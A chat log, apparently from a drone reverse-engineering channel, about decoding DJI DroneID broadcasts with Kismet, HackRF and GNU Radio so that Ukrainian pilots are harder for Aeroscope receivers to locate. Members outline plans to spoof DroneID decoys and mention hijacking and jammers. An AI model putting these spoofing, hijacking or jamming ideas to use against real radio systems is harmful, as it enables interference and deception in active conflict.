[2022-04-04 01:59:02]
hostile :
@dkovar weird... ```cloud whistle fixed equipment```
[2022-04-04 01:59:21]
hostile :
[2022-04-04 02:03:01]
hostile :
```云哨```
[2022-04-04 02:09:06]
hostile :
If anyone has an enhanced Wifi Drone and capability to test Kismet (with a 5mhz capable wifi card)
[2022-04-04 02:09:15]
hostile :
DroneID: Add DJI home/app locations to UI, fix home display, update
https://github.com/kismetwireless/kismet/commit/8a31283dfafb7b085ecb7766256b43d661a9f7ca
[2022-04-04 02:23:31]
hostile :
these aeroscope antenna arrays get out of hand!
[2022-04-04 02:23:39]
hostile :
[2022-04-04 02:23:44]
hostile :
https://dl.djicdn.com/downloads/AEROSCOPE/20180525/AEROSCOPE_Directional_Antenna_G-16_CH.pdf
[2022-04-04 05:39:53]
skyninja :
For the G16 you need 4 Aeroscopes.
[2022-04-04 06:42:53]
skyninja :
i do not understand its use, because i'd guess line of sight is the bottleneck, not antenna gain.
[2022-04-04 06:45:02]
the_lord :
I agree with you, but in open areas it will cover huge distances
good for very early warning
[2022-04-04 07:53:18]
skyninja :
my strategy would be four aeroscope with G8 antenna geographically dispersed.
[2022-04-04 10:21:01]
argonaut :
argonaut joined the channel.
[2022-04-04 12:20:56]
dkovar :
Generally your first priority is height for your antenna but gain still matters.
I'd do well dispersed G8s but, depending on your use case, a honkin' single G16 could do the trick.
[2022-04-04 13:31:26]
stanlee :
You think that they f'd the ground plane? I thought they are using the same ublox chip as the Air2S, etc and they have no GPS issues?
[2022-04-04 13:33:22]
hostile :
I mean they are using WEP for a c2 link... this is par for the course lol
[2022-04-04 14:02:41]
fredmicrowave :
This antenna array must be so directional that if you fly at its vertical you may remain undetected :smile:
[2022-04-05 01:36:17]
skarzhevsky :
skarzhevsky joined the channel.
[2022-04-05 01:38:38]
skarzhevsky :
Hi @hostile !
[2022-04-05 02:36:24]
hostile :
is there any updated version of this document? https://dl.djicdn.com/downloads/AEROSCOPE/20180525/Aeroscope_SDK_Linux_User_Guide_EN.pdf
[2022-04-05 03:15:48]
skarzhevsky :
Hi @hostile. Most likely this video was sent to you by my friends.
We do have a problem with DJI drones. Our military received a lot of DJI equipment.
Although the video is old, the problem really exists.
Our guys could not have made a more recent video of their positions being shelled after the drone was launched.
While the Russian troops were near Kiev, our troops had to turn off the GPS on the controller, launch the DJI drones from one place and immediately run away from the launch point.
Because for 2 minutes the launch site was under mortar fire. We had information that the Russians were using aeroscopes against our drone pilots.
To somehow bypass the DroneID we need an update from DJI, which will disable the sending of DronIDs.
As a variant, my suggestion was to simply spoof the droneid to create a lot of decoys for the aeroscope.
This would make it possible to partially neutralize enemy aeroscopes. Or software shutdown of droneids, but for this I need to root drones (which is not clear for Mavic 2).
At the moment I have several drones for experiments:
- DJI Mavic Pro
- DJI Mavic 2 Enterprise Advanced
Also, our military promised to bring me an aeroscope to check the solutions, if it turns out to deceive the aeroscope or make it work incorrectly.
If you have any ideas, solutions, thoughts, please share them.
In turn, I can:
- test it on various equipment
- turn into a turnkey solution for the military
- distribute this decision
I'm also looking for any simple/cheap and accessible solutions for detecting enemy drones. The solution should notify our troops of the presence of drones above them.
So far I have sketches based on hackrf.
[2022-04-05 03:17:49]
hostile :
"the problem really exists" this I'm aware of for sure! Just folks directly attributing the video to Aeroscope without more proof has been a touchy discussion. I'm working to liberate what I can DroneID wise. I assume you saw this addition to Kismet. This should be useful for EnhancedWifi DJI drone. https://github.com/kismetwireless/kismet/commit/8a31283dfafb7b085ecb7766256b43d661a9f7ca
[2022-04-05 03:26:52]
hostile :
but this problem with Aeroscope and your safety is one of the main reasons I came out of retirement from drone work. I feel DJI is being less than honest about their ability to disable droneID to help your people. I also have noted they claimed droneID is "encrypted" so only "good guys" can use it. These things do not sit well with me. I've gotten many requests to help with spoofers and sniffers.
[2022-04-05 03:28:34]
hostile :
Right now I'm aware several folks hackRF scripts for receiving Occusync DroneID, but they are still held in private. If I can't talk someone into liberating the .grc I'll be working with @Icer to create an open source one everyone can see and use. My plan is basically to make AeroScope unusable until DJI does something about it.
[2022-04-05 03:31:44]
skarzhevsky :
I'll try to assemble it today and test it. Half a year ago, the kismet drone detector did not work for DJI. Also, data exchange between the remote control and the drone can occur at offset frequencies that do not match the WiFi channels.
[2022-04-05 03:32:50]
hostile :
Kismet only works with specific wifi cards, and kismet settings.
[2022-04-05 03:33:09]
hostile :
a known working Atheros ath9k is
Atheros QCNFA222 AR5BWB222 you also MUST change the channel list: source=wlan0:add_channels="149W5,153W5,157W5,161W5,165W5,151W5,155W5,159W5,163W5,153W5,1W5,2W5,3W5,4W5,5W5,6W5,7W5,8W5,9W5,10W5,11W5,12W5,13W5,14W5"
[2022-04-05 03:33:52]
hostile :
[2022-04-05 03:34:14]
hostile :
very few cards work, MUST be M.2 version, no USB works due to driver limitations.
[2022-04-05 03:34:53]
hostile :
only works for "Enhanced Wifi" drones, Spark, Mavic Air, Mavic Mini, Mini SE.
[2022-04-05 03:35:16]
skarzhevsky :
Can physical access to the aeroscope help? I don’t know if the military will let me take it apart, but I can think of something.
[2022-04-05 03:35:40]
hostile :
not specifically in this case. Won't be very useful.
[2022-04-05 03:37:26]
hostile :
I think in here @skyninja & @nullrefexception are the only ones to openly discuss that they can successfully use hackRF to receive and decode OccuSync DroneID. We must maybe send their wives roses, or chocolate, and sweet talk them to share so we can help save lives. Some people are in an odd position and can not share such things, so if we can not convince sharing, we will work to liberate it.
[2022-04-05 03:38:09]
skarzhevsky :
This will be difficult if a mass solution is needed
[2022-04-05 03:38:21]
hostile :
I think in here @skyninja & @nopexecutor are the only ones to openly discuss that they can successfully use hackRF to receive and decode OccuSync DroneID. We must maybe send their wives roses, or chocolate, and sweet talk them to share so we can help save lives. Some people are in an odd position and can not share such things, so if we can not convince sharing, we will work to liberate it.
[2022-04-05 03:39:10]
hostile :
@skarzhevsky I'm sure someone could source a pile of the cards for you and deliver them. If people are getting crates of DJI drones there, they can also get crates of WIFI cards that support 1/4 rate.
[2022-04-05 03:39:35]
hostile :
but yes... supporting m.2 wifi card is only certain laptops. Could also configure a raspberry pi. There are some choices.
[2022-04-05 03:39:56]
hostile :
not optimal, but it is the most reliable solution, until we complete something different
[2022-04-05 03:41:00]
hostile :
gnuradio gr-ieee802-11 can also be used for enhanced wifi
[2022-04-05 03:44:41]
hostile :
[2022-04-05 03:45:00]
hostile :
this here shows a DJI drone picked up with hackRF
[2022-04-05 03:45:17]
hostile :
and kismet running next to it confirming same information
[2022-04-05 03:48:19]
hostile :
for now with Occusync DroneID we must beg, borrow, or steal a hackRF flowgraph .grc.
[2022-04-05 03:48:55]
hostile :
I'm not below bribery, or GoFundMe =]
[2022-04-05 03:49:23]
hostile :
maybe one of them needs a fancy new drone for their troubles.
[2022-04-05 04:20:20]
skarzhevsky :
@skyninja @nopexecutor Please tell me, at what distance did you manage to intercept and decode DroneID messages from a DJI drone using HackRF and what antenna did you use?
[2022-04-05 04:58:38]
hostile :
https://dji-rev.com/dji-rev/pl/g7i78sioxj8c8rdkwddqnd98tc
[2022-04-05 04:58:44]
hostile :
https://dji-rev.com/dji-rev/pl/ah5bgc5n8fngxnuutwqum1yuqw
[2022-04-05 04:58:58]
hostile :
https://dji-rev.com/dji-rev/pl/tp6g78eqg3fwux4nnhs8xb3xec
[2022-04-05 05:01:32]
hostile :
https://dji-rev.com/dji-rev/pl/obsjx6zwejfh3pfqud3o5ft79c
[2022-04-05 05:01:34]
hostile :
https://dji-rev.com/dji-rev/pl/gjz1ir58nif1f8pnhzyztdptyw
[2022-04-05 05:05:23]
hostile :
sample cap here https://dji-rev.com/dji-rev/pl/rtuygdnpkjyx5efopjsw1xqgqo
[2022-04-05 05:05:26]
hostile :
https://dji-rev.com/dji-rev/pl/tknswxsjup8zzercc3pxwhsybw
[2022-04-05 05:06:57]
hostile :
This a long time ago worked to disable droneID. https://dji-rev.com/dji-rev/pl/eythrun33tbouc4g6p33madrow I think the command is signed now IIRC.
[2022-04-05 05:07:11]
hostile :
https://dji-rev.com/dji-rev/pl/egxt1knyw3r68rawsfa5487nja
[2022-04-05 05:09:46]
hostile :
https://dji-rev.com/dji-rev/pl/fi9efdtgufbb5rkd8gg5zr315o
[2022-04-05 05:09:48]
hostile :
https://dji-rev.com/dji-rev/pl/5bb9txt4sjgafyptq8z7j5f1eo
[2022-04-05 05:10:02]
hostile :
as you can see all kinds of historic info in here @skarzhevsky
[2022-04-05 05:10:46]
hostile :
https://dji-rev.com/dji-rev/pl/476zr9snwjggtfscwkqxf7jz9r
[2022-04-05 05:15:36]
hostile :
so here our Occusync ninjas are @nopexecutor @skyninja @validat0r @atlantic and @tmbinc. The best we are likely to get in the near term I assume would be assistance while fumbling along to catch up. Intelligent questions will likely need to be answered
[2022-04-05 05:15:48]
hostile :
@icer check the backlog tonight btw... good recap.
[2022-04-05 07:00:25]
the_lord :
I never saw any update on this document since it was released
Maybe nobody purchased this SDK :)
[2022-04-05 07:39:06]
skyninja :
I have never understood the purpose of this document. Why did they publish it, you can't do anything with it.
[2022-04-05 12:39:05]
hostile :
You can buy aeroscope SDK for $$$$ and make your own integrations @skyninja
[2022-04-05 12:39:57]
skyninja :
easier to use the web SDK REST API, isn't it?
[2022-04-05 12:41:38]
hostile :
depends on your integration path. "easier" is subjective
[2022-04-05 18:31:08]
hostile :
just posted this in a few other rooms.
[2022-04-05 18:31:26]
hostile :
but interesting. I was just asking about the UTMISS stuff. https://www.doi.gov/sites/doi.gov/files/dji-government-edition-android-and-assistant-update-analysis-2021-05-06.pdf
[2022-04-06 02:38:36]
hostile :
Here is a patch to help gr-ieee802-11 see DJI EnhancedWifi on the default channel + some things to silence overly verbose debug messages. https://dji-rev.com/dji-rev/pl/jcykuwqwxbns7bhiyrx1m4etwc
[2022-04-06 17:51:03]
quad_fan :
quad_fan joined the channel.
[2022-04-06 22:21:13]
hostile :
can anyone in @channel confirm the OccuSync droneID logic? is it like enhanced wifi in that it waits for the props to be on before broadcast?
[2022-04-06 22:21:41]
hostile :
can anyone in @here confirm the OccuSync droneID logic? is it like enhanced wifi in that it waits for the props to be on before broadcast?
[2022-04-06 22:33:52]
tmbinc :
I think that was the case, yes
[2022-04-06 22:49:22]
hostile :
@tmbinc we're seeing a signal that's about 10 mhz wide, only shows up every ~ 600 milliseconds, is definitely from the drone, and it's 100% not the video downlink. But props aren't armed so wasn't sure if this was it or not.
[2022-04-06 23:00:08]
the_lord :
not all drones need motor arm to start droneID
[2022-04-06 23:02:58]
hostile :
know about mini 2 behavior?
[2022-04-06 23:05:08]
the_lord :
as far as I remember, all new drones start broadcasting droneID once switched on
[2022-04-06 23:19:42]
rflagg :
I haven't been able to get a mavic3 to broadcast drone ID in the US even when flying...
[2022-04-06 23:19:57]
tmbinc :
Maybe I was just unlucky in capturing it then. Yes, droneid is every 640ms (every 640 subframes)
[2022-04-06 23:20:05]
rflagg :
But I've seen video of people using the opendroneid app on the mavic3 in italy
[2022-04-06 23:20:18]
hostile :
opendroneID, and DJI drone ID are two different things
[2022-04-06 23:20:30]
hostile :
one is the EU spec, the other DJi's
[2022-04-06 23:20:56]
rflagg :
ok, so opendroneID only shows up when GPS says it's in EU?
[2022-04-06 23:21:27]
hostile :
yes
[2022-04-06 23:21:29]
rflagg :
is drone ID for the mavic3 supposed to be a wifi beacon still? tried all kinds of things to sniff it
[2022-04-06 23:21:42]
rflagg :
it's that ie1000 chip
[2022-04-06 23:21:52]
hostile :
occusync should have its own droneID packet from DJI in the occusync comms
[2022-04-06 23:22:34]
rflagg :
ok, so that's what occusync is... has anyone sniffed occusync?
[2022-04-06 23:23:10]
hostile :
scroll up... to my re posts of chatter from last night
[2022-04-06 23:29:55]
rflagg :
Ok, so it's a GnuRadio project.
[2022-04-07 00:33:27]
hostile :
for occusync, gonna have to be
[2022-04-07 00:33:35]
hostile :
Mavic3 is occusync
[2022-04-07 00:34:22]
hostile :
got my dude honed in now
[2022-04-07 04:19:46]
hostile :
constellation view for Occusync on Mini 2
[2022-04-07 04:20:48]
hostile :
[2022-04-07 04:22:59]
hostile :
my dude said thanks btw @tmbinc https://github.com/tmbinc/random/blob/master/dji/ocusync2/play.py
[2022-04-07 04:28:19]
hostile :
does anyone know the zadoff chu params and how the two synchronization sequences are created? We need them in order to properly adjust phase offsets since it doesn't look like there are pilots. My dude is eyeballing the zc sequence to figure out what is going on tomorrow hopefully. But if ya have hints chuck em out.
[2022-04-07 04:44:52]
hostile :
FEC detail anyone?
[2022-04-07 05:23:26]
tmbinc :
FEC is just normal LTE turbo code
[2022-04-07 05:24:16]
tmbinc :
Phase offsets (fractional sample offset) is precisely the problem I wasn't able to solve automatically
[2022-04-07 07:02:14]
tmbinc :
Scrambling i'm not sure - gold code repeats on 3rd symbol (i.e. 0+1, then 2+... use the same "dummy" sequence), is that some LTE stuff?
[2022-04-07 07:39:14]
goguma :
goguma joined the channel.
[2022-04-07 09:54:28]
tho :
tho joined the channel.
[2022-04-07 10:18:59]
ray_t :
ray_t joined the channel.
[2022-04-07 14:00:53]
john_duff :
john_duff joined the channel.
[2022-04-07 14:07:22]
stanlee :
It's fun to watch @hostile here basically killing it as a boss!
[2022-04-07 14:22:16]
hostile :
I'm just a master cat wrangler! There are plenty of cats to wrangle to help liberate info!
[2022-04-07 14:27:14]
mavic2reverser :
soooooo how soon after @hostile publishes all this does DJI shit a brick and decide to make occusync 4.0 that's TOTALLY different.... meaning some new DJI shit crypto
[2022-04-07 14:30:02]
hostile :
TBH I hope it forces them to sign the droneID packets
[2022-04-07 14:30:26]
hostile :
or sunset it entirely. The EU standard should IMHO similarly be signed packets.
[2022-04-07 14:30:35]
hostile :
but that's a management nightmare lol
[2022-04-07 14:30:49]
hostile :
cuz you know we just gonna steal what ever keys would be used
[2022-04-07 14:31:29]
hostile :
therein lies the joke "H.A.R.D. - Hackers Against Remote DroneID" this is hard!
[2022-04-07 15:06:39]
mavic2reverser :
plus it brings into the conversation: how do you sign it? HOW DO YOU PROTECT THE KEY WHICH SIGNS IT??? we all know the super talented here can generate or leak their keys
[2022-04-07 15:07:06]
mavic2reverser :
and all it takes is for one to leak the key for all!
[2022-04-07 15:07:56]
hostile :
what you do is ya pack your bags up, turn that shit off, go home and call it a good run. =]
[2022-04-07 15:08:31]
mavic2reverser :
but then how will china collect data and track people?!!
[2022-04-07 15:20:39]
hostile :
some interesting stuff in here: https://jrupprechtlaw.com/wp-content/uploads/2021/08/19-Brennan-and-RDQ-Opening-Brief-Addenda.pdf
[2022-04-07 15:20:52]
hostile :
[2022-04-07 15:28:01]
mavic2reverser :
with remote ID enforcement coming soon for all drones, I'm wondering how open source alternatives like px4 or Ardupilot will enforce it. nothing prevents someone from gutting that feature out of the code and recompiling
[2022-04-07 15:40:29]
joonas :
don't know about px4 or ardupilot specifically, but i imagine for us fpv folks (well, i'm from the eu so... different story anyway) it's going to basically have to be a separate uart module that you'll have to install, in addition to now also requiring gps. and i think there's an exemption for sub 250g? so very likely it'll be a configurable thing anyway. so basically, it's down to pilot liability.
[2022-04-07 15:52:51]
hostile :
rulemaking carves out exceptions
[2022-04-07 15:53:06]
hostile :
mavlink has droneID support now
[2022-04-07 15:55:49]
hostile :
https://jrupprechtlaw.com/wp-content/uploads/2021/03/19-Brennan-and-RDQ-Opening-Brief.pdf
[2022-04-07 16:12:54]
hostile :
Progress from Protoman here https://github.com/proto17/dji_droneid/tree/main/matlab
[2022-04-07 17:15:53]
jan2642 :
Would that work in Octave ?
[2022-04-07 17:20:33]
hostile :
checking
[2022-04-07 17:25:31]
hostile :
"it will not due to some functions i'm using, but i think i can create those functions by hand. let the person know that i'm gonna try to make it run in octave too", so sit tight @jan2642
[2022-04-07 18:14:25]
jan2642 :
That would be cool, thanks!
[2022-04-07 18:46:25]
tmbinc :
Does the code above not have the problem of a sampling offset (corresponding to I/Q rotation proportional to subcarrier index)?
[2022-04-07 18:46:33]
tmbinc :
I don't see it correcting for that but that's the issue I ran into
[2022-04-07 18:46:41]
tmbinc :
(mainly due to no pilots)
[2022-04-07 19:03:13]
azerbaijan :
26519433644a joined the channel.
[2022-04-07 19:11:53]
hostile :
@jan2642 updated to use Octave
[2022-04-07 19:12:37]
hostile :
@tmbinc he's working at solving that freq offset issue now
[2022-04-07 19:13:48]
hostile :
pilot issue was the deal last night https://dji-rev.com/dji-rev/pl/ex311sgn7jddmksixbwrxpijsy
[2022-04-07 19:25:44]
hostile :
@tmbinc he said he "solved the timing offset issue by oversampling 4x and hunting for the first ZC sequence (it's symmetric so i can autocorrelate for it). that helps keep the data carriers from rotating (no walking phase rotation)"
[2022-04-07 19:27:50]
tmbinc :
Hunting for it in time domain?
[2022-04-07 19:28:19]
hostile :
I'll see if I can get him to hop on here and discuss real time
[2022-04-07 19:28:44]
hostile :
" to deal with the absolute phase rotation i need to know at least one data carrier in the burst that never changes. i can reference all other data carriers to it and be golden. worst case is i try all 4 phase rotations and let the CRC tell me if i got it right"
[2022-04-07 20:09:49]
hostile :
"i've got a single carrier always clocked at 45 degrees. if that's legit then it might help with phase correction even though we don't know the zc sequence"
[2022-04-07 20:26:02]
hostile :
bits! time to sort out the scrambler params
[2022-04-07 20:33:21]
jan2642 :
Which SDR is used ? 5.782 GHz and a samplerate of 30.72 MHz. My Lime doesn't go above 3.8 GHz but I've forced the mavic 2 to 2.4 GHz.
[2022-04-07 20:33:54]
jan2642 :
A HackRF can go to 6 GHz but only 20 MHz wide.
[2022-04-07 20:34:18]
the_lord :
welcome back jan2642, as I knew from the guys, you can't see the droneID in the waterfall
[2022-04-07 20:37:12]
jan2642 :
Hi @the_lord ! But I can see the frequency and bandwidth. As far as I know only the upstream uses frequency hopping but downstream is at a fixed frequency.
[2022-04-07 20:38:28]
the_lord :
as I understood, it's too small to be seen on the waterfall
[2022-04-07 20:39:44]
hostile :
currently testing with ettus b205-mini
[2022-04-07 20:45:13]
icer :
A bladerf micro can do 30mhz with no problem
[2022-04-07 20:47:30]
jan2642 :
less expensive, still expensive ?
[2022-04-07 20:50:07]
hostile :
@jan2642 misleading filename... he's also using 2.4ghz FYI
[2022-04-07 20:50:45]
hostile :
``` Recordings were taken with an Ettus B205-mini at a sampling rate of 30.72 MSPS. The signal of interest is in 2.4 GHz and will show up every 600 ms or so. It will be 10 MHz wide (15.56 MHz with guard carriers).```
[2022-04-07 20:51:33]
hostile :
https://github.com/proto17/dji_droneid/blob/main/README.md?plain=1#L12
[2022-04-07 21:17:03]
tmbinc :
Here's a PNG showing the different signal components over ~1.3s
[2022-04-07 21:17:09]
tmbinc :
Sorry it's too wide to display inline (hence the .zip)
[2022-04-07 21:17:46]
tmbinc :
You can clearly see the droneid packets every 640ms
[2022-04-07 21:18:28]
tmbinc :
The hopping pattern is really interesting as well
[2022-04-07 21:18:41]
tmbinc :
Some kind of .. sine? function
[2022-04-07 21:18:59]
tmbinc :
Which also changes? (This is one continuous capture)
[2022-04-07 21:22:06]
jan2642 :
So I have to look for a 10 MHz-wide signal at 640 ms intervals but at a different frequency than the video stream ?
[2022-04-07 21:22:26]
tmbinc :
Yes
[2022-04-07 21:22:39]
tmbinc :
I think it's at a fixed frequency, either in 2.4GHz or 5GHz band, but I'm not sure
[2022-04-07 21:47:50]
hostile :
yeh needs to be fixed cuz aeroscope isn't hopping
[2022-04-07 22:05:17]
jan2642 :
I have to stop and go to bed, I did too many stupid things in a row... I didn't see the signal and thought that maybe it was because the drone wasn't flying (mavic 2). There's a storm outside so I had the brilliant idea of firing it up inside without remembering that the blades can be removed. Next I accidentally hit the stick of the remote and off it went. In a panic reaction I tried to grab it from below but my fingers went up too high. Result: blood blisters on the top of 4 fingers. I hope I can still type tomorrow ?
[2022-04-07 22:24:49]
hostile :
you don't actually have to "fly" btw
[2022-04-07 22:24:59]
hostile :
simply arming the sticks works
[2022-04-07 22:25:17]
hostile :
jesus man! hopefully you ok!
[2022-04-07 22:25:23]
hostile :
#RespectTheProp for sure
[2022-04-07 22:25:26]
hostile :
they DO bite
[2022-04-07 22:26:04]
hostile :
lucky you didn't remove fingers!
[2022-04-08 04:05:21]
hostile :
my dude asking some very specific questions ATM
[2022-04-08 04:05:25]
hostile :
"what are the parameters required to seed the second scrambler LFSR, *exactly* how does one apply the turbo decoder (can i just throw the bits from all data carriers into a turbo decoder configured for 3GPP mode and get valid data)"
[2022-04-08 04:06:49]
hostile :
also repo updated with all current info https://github.com/proto17/dji_droneid
[2022-04-08 04:07:45]
hostile :
someone asked about frequencies.
[2022-04-08 04:07:50]
hostile :
[2022-04-08 09:41:51]
andrewbboo :
andrewbboo joined the channel.
[2022-04-08 10:28:58]
j4ck :
Hi guys, I am part of a german researcher group and we have also investigated the OcuSync protocol and DroneID. We are now able to receive DroneID and decode it automatically. This also shows that there is no security or encryption layer in the DroneID packages as claimed by DJI. We also plan to release our code soon and open source our toolset. If you are interested in an exchange feel free to write me. We were also able to modify the serial number of the FC, which also shows up in the DroneID packages.
[2022-04-08 10:37:56]
tho :
As a quick note: @j4ck has also implemented a DUML fuzzer and reverse engineered parts of the controller and drones (focus on the S1 chip). We plan to document the results in a scientific article soon, feel free to reach out to him. @tmbinc helped us a lot - kudos to him!
[2022-04-08 10:42:49]
w0h :
That's interesting! I also wrote a DUML fuzzer for the logic protocol for my thesis and am also close to completion!
[2022-04-08 10:42:49]
w0h :
That's interesting! I have done the same for my Bachelor Thesis and am also close to completion!
[2022-04-08 10:45:18]
bin4ry :
great work guys !
[2022-04-08 13:32:01]
rebellion :
rebellion joined the channel.
[2022-04-08 14:14:37]
tmbinc :
So, next step is to decode arbitrary packets? :)
[2022-04-08 14:18:20]
tho :
and spoof packets :-)
[2022-04-08 14:18:35]
hostile :
yup. That is the important conversation changing part.
[2022-04-08 14:18:45]
tho :
or analyze the pairing process to understand if/how drones can be hijacked...
[2022-04-08 14:18:45]
hostile :
democratize packet generation, and reception
[2022-04-08 14:19:13]
hostile :
@tho having worked at a CUAS company, I can tell you for a fact that they can be hijacked, and DUML injected.
[2022-04-08 14:19:39]
tho :
interesting!
[2022-04-08 14:19:59]
hostile :
we actively demonstrated this for LightBridge protocol at BlackDart among other places.
[2022-04-08 14:31:04]
hostile :
@j4ck if you can help with some answers on the scrambler that would be useful! https://dji-rev.com/dji-rev/pl/d1hiy9cii7bedjxfkkgz1g4msc
[2022-04-08 14:33:28]
hostile :
@hotelzululima pointed out some jammers in this paper, anyone tried em against Occusync? https://digital.wpi.edu/downloads/xk81jn93r A bit off topic for this room specifically, but interesting nonetheless. Some python code attached at the end of the paper.
[2022-04-08 14:52:32]
proto :
proto joined the channel.
[2022-04-08 14:54:11]
hostile :
ahhhh snap. It's all over now. We apparently let anyone in here, @proto =] Folks this is my homeboy that's been helping with the Occusync work here: https://github.com/proto17/dji_droneid
[2022-04-08 14:54:23]
proto :
hello all!
[2022-04-08 15:04:21]
dragorn :
dragorn joined the channel.
[2022-04-08 15:05:10]
dragorn :
LMK when you're ready to release some code, would love to automate pulling it into kismet as well; i've got adsb plotting, should be able to add droneid wifi and rf plotting to it fairly easily
[2022-04-08 15:05:50]
proto :
as @hostile pointed out, I've been working on demodulating and decoding the DroneID frames. I have some MATLAB/Octave scripts that can detect the first Zadoff-Chu sequence for timing lock, do a *very rough* frequency offset detection using the cyclic prefixes (this needs some love), extract out the data carriers from symbols 1,2,3,5,7,8,9, and finally demod bits from the QPSKs. What remains is the scrambler, FEC, and rate matching. My experience with cellular protocols is almost non-existent. It's been pointed out in here that the scrambler and FEC are following the LTE spec. The issue I'm having is that I simply don't know the spec enough to figure out what knobs to turn. As an example, I'm currently stuck trying to figure out the initial state of the second LFSR used to generate the scrambling code. The first one is a constant value (hooray!), but the second requires information about the UE (https://edadocs.software.keysight.com/pages/viewpage.action?pageId=6076479&preview=/6076479/6076480/pdsch_cinit.gif)
[2022-04-08 15:07:22]
proto :
So, if anyone here has any info that could help I'd love to hear it! Will be making everything open source. I hope to make a GNU Radio flow graph (probably with some custom OOT modules) to decode these on the fly
[2022-04-08 15:14:21]
atlantic :
reverse engineering is an art where the journey is more important than the destination. do not ask for direct answers, but do the puzzle and learn a lot. You are doing Ocusync 2 and in that version it happens that DJI gave us a gift to solve the scrambling puzzle.
[2022-04-08 15:15:19]
atlantic :
also in slicing the bits, you should be more soft and not so hard, you will gain more from it ?
[2022-04-08 15:16:33]
hostile :
@atlantic that altruism is great bud... we're trying to stop people from getting shelled by Russians. Some of us aren't here for the journey. We are dedicating very small amounts of free time to saving lives.
[2022-04-08 15:16:47]
proto :
i assume you mean soft decision vs hard decision? i've decided just for the moment to ignore soft decision as i have a pristine collect to work with. but i completely agree that soft decision is the way to go in the future
[2022-04-08 15:20:11]
proto :
i'd be game to try random things with the second LFSR initial state (all ones, all zeros, revs, etc) if there were a plaintext under that i could validate with. but, considering that i still have to account for the FEC and rate matching, i don't think i would have anything to tell me that i was on the right track. unless there is a CRC that's sent along with the FEC which would be very nice :) then i could just try things and throw the resulting bits at reveng (https://reveng.sourceforge.io/)
[2022-04-08 15:22:49]
skyninja :
you can spoof any DJI drone with wifi, even the drones that are ocusync. Aeroscope does not tell its source to the operator. Also you can spoof with normal 20 MHz wifi, no need for quarter channel. Aeroscope is dumb. So for spoofing there is no need to RE Ocusync.
[2022-04-08 15:23:03]
tmbinc :
lol nice
[2022-04-08 15:23:43]
proto :
@skyninja i think the issue is that even if you spoof WiFi frames the DroneID is still getting out and isn't WiFi (it's LTE-like afaik)
[2022-04-08 15:24:41]
skyninja :
But RE Ocusync will not stop it from being transmitted,
[2022-04-08 15:25:07]
hostile :
@skyninja *for now*.... and I think that does make some assumptions, one being for example that Aeroscope is the only device being used for reception. The 20 MHz wifi spoof has been a thing ever since I first demonstrated with the "throwies". TBH I'm surprised DJI hasn't adjusted their code a bit. It is only a matter of time before a customer asks for more robust detections.
[2022-04-08 15:25:31]
proto :
@skyninja correct, but in the course of the RE work for DroneID, we learn how to spoof those frames and overwhelm an aeroscope
[2022-04-08 15:25:38]
hostile :
@skyninja no, but for 'old crows' and EW folks... picking out a fake WiFi frame amongst Ocusync frames sticks out like a sore thumb.
[2022-04-08 15:26:01]
hostile :
also it is trivial to simply disable the wifi detection altogether in the aeroscope IMHO
[2022-04-08 15:27:05]
hostile :
If you don't get the 'crows' reference. https://www.crows.org
[2022-04-08 15:27:28]
proto :
oh, and if things like the takeoff location are sent via DroneID, we can spoof those as well :)
[2022-04-08 15:28:35]
dragorn :
I'd agree re: spoofing being blatant, but there's a lot of nonsense you can do, depending on the goals
[2022-04-08 15:28:40]
skyninja :
the bytes transmitted in an ocusync drone id = 100% bytes in wifi drone id.
[2022-04-08 15:28:50]
hostile :
this isn't just a *fun* game of 'can I break the toy protocol from the hobby drone company' any more. People's lives legit depend on this protocol being opened in *full* for both reception and packet generation. This happens to be in one *theater* for now. We'll be having this discussion again in another theater in a matter of time.
[2022-04-08 15:28:59]
skyninja :
just a different carrier
[2022-04-08 15:29:03]
dragorn :
@skyninja i think it was in reference to being obvious when you have 2 occusync devices on the scope, and 10000 wifi ones.
[2022-04-08 15:29:09]
dragorn :
since wifi is trivially spoofable
[2022-04-08 15:29:48]
skyninja :
but on an Aeroscope you do not see whether it was received on wifi or ocusync
[2022-04-08 15:30:08]
hostile :
correct... and you'd be a fool to think aeroscope is the only fielded solution.
[2022-04-08 15:30:11]
dragorn :
re: spoofing for countermeasures in this specific situation, i'd suggest capturing the existing drone serial numbers and coordinates, then flooding with a thousand adjacent serial numbers above and below, and fuzzing the coordinates by some percentage - 5%? 10%?
[2022-04-08 15:30:58]
dragorn :
because you don't want the legit device you presumably can't deactivate beaconing on to be discernable either by unique/valid id, or unique/consistent/valid/regionally local location
[2022-04-08 15:31:16]
dragorn :
just fill the monitoring system with a thousand+ devices that are all equally plausible
[2022-04-08 15:31:47]
hostile :
there is also something to be said about the fact that I created this place to liberate information. We all have a tendency to keep our cool shit to ourselves. Literally none of us would be here had I not *shared* and pushed for continual sharing. I've been gone for 3 years... I'm back... and I'm gonna do what I used to do. Push conversations OUT of DM's and private rooms, and back into the open so we can foster doing cool shit *together* instead of operating in a vacuum. The RedHerring had a purpose... https://github.com/MAVProxyUser/P0VsRedHerring
[2022-04-08 15:31:49]
dragorn :
downsides: you may now be throwing nearby locations into the targeting system
[2022-04-08 15:32:44]
skyninja :
downside: you may accidentally give the GPS of somebody's house
[2022-04-08 15:32:50]
dragorn :
As I said.
[2022-04-08 15:33:11]
hostile :
@dragorn I'd like to get to a point where we can feed it DJI log files, and provide the code with an offset from the existing GPS locations. And let it *replay* historic flights.
[2022-04-08 15:33:33]
hostile :
It would be nice to load up a device full of log files, and an offset, and set it somewhere and let it spoof all night a pile of legit flight paths
[2022-04-08 15:33:45]
hostile :
localized to current location, or anywhere the operator desired.
[2022-04-08 15:35:34]
hostile :
@hotelzululima and I used to talk of "crybaby"... this is basically that concept. https://twitter.com/d0tslash/status/845110652293332992?s=20&t=-7OYs0yQGzh9Qn8Ux-WnGA
[2022-04-08 15:35:42]
dragorn :
I think it needs to be clear: What's being discussed is warfare. If anyone here thinks they, personally, are going to be deploying jackass hacker code against fucking *russia* with no repercussions or side effects... yeah. Shit's real. I wouldn't advocate *anyone* think they're going to deploy spoofer code in a literal warzone with active civilian casualties on a whim and just run with it.
On the other hand, I would be 100% comfortable with providing a documented, working system to the defense commanders and allowing THEM to make the decisions they need to make.
[2022-04-08 15:36:23]
hostile :
[2022-04-08 15:37:20]
hostile :
I know some of you have been passed on OPSEC documents that are being fielded right now in Ukraine as a means to keep pilots alive. Literal checklists of things to do, to not die while using DJI drones. I'm just trying to help level the playing field *here*, and everywhere else.
[2022-04-08 15:38:03]
hostile :
